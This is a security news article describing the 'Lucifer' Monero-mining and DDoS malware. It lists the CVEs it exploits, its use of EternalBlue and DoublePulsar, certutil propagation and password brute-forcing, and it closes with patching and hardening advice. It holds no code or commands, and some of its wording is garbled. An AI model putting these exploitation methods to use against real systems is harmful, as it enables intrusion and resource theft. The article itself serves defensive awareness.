Lucifer: Novel Monero-Mining Malware

The recent spread of the distributed denial-of-service tool attempts to exploit a dozen web-framework flaws, uses credential stuffing, and is intended to work against a variety of operating systems.

A new kind of “hybrid crypto-jacking malware” has been discovered by Palo Alto Networks’ ‘Unit 42’ researchers and they named the malware –“Lucifer.” The malware is a variant of an old crypto theft code Ransomware. The new variant is used for crypto currency mining but can also facilitate distributed denial of service (DDoS) attacks well-equipped with all kinds of exploits against vulnerable Windows hosts.

 While the malware author named their malware Satan DDoS, there’s another malware, Satan Ransomware, bearing that devious name already. An alternative alias was given to this malware to avoid confusion. So they called it “Lucifer”.


Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking. XMRig is a miner specifically, a type of threat that is used to make money at the expense of computer users by using the infected computer users to mine Monero, a cryptocurrency.It can cause a computer to overheat and perform poorly, since XMRig uses additional system resources, taking these away from the victim. Once XMRig is installed, the malware connects to the command-and-control (C&C) server to self-propagate, further exploit systemic vulnerabilities, and brute-force its way into higher levels of access. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections.

The exhaustive list of weaponized exploits includes CVE-2014-6287CVE-2018-1000861CVE-2017-10271ThinkPHP RCE vulnerabilities (CVE-2018-20062)CVE-2018-7600CVE-2017-9791CVE-2019-9081PHPStudy Backdoor RCECVE-2017-0144CVE-2017-0145, and CVE-2017-8464. These vulnerabilities have either “high” or “critical” ratings due to their trivial-to-exploit nature and their tremendous impact inflicted on the victim.

How are attackers exploiting the devices?

Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation. Fortunately, the patches for these vulnerabilities are readily available.

Lucifer is a new hybrid of cryptojacking and DDoS malware variants that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms. Applying the updates and patches to the affected software are strongly advised. The vulnerable software includes Rejetto HTTP File Server, Jenkins, Oracle Weblogic, Drupal, Apache Struts, Laravel framework, and Microsoft Windows.


It is recommended to consider the following best practices:

  • Ensure that your Windows has the latest security updates.
  • Use a strong password for your Windows account. Lucifer tries to break into systems, bombarding them with common usernames and passwords such as administrator " and “123123", and so onwards. Strong passwords are also encouraged to prevent dictionary attacks.
  • Companies should lock down their containers and Docker hosts. Users should connect to the docker daemon with SSH, never use Docker images from unknown repositories or maintainers, and use firewall rules to limit the IP addresses that can access the Docker host.
  •  A strong internet security software suite can help block crypto-jacking threats.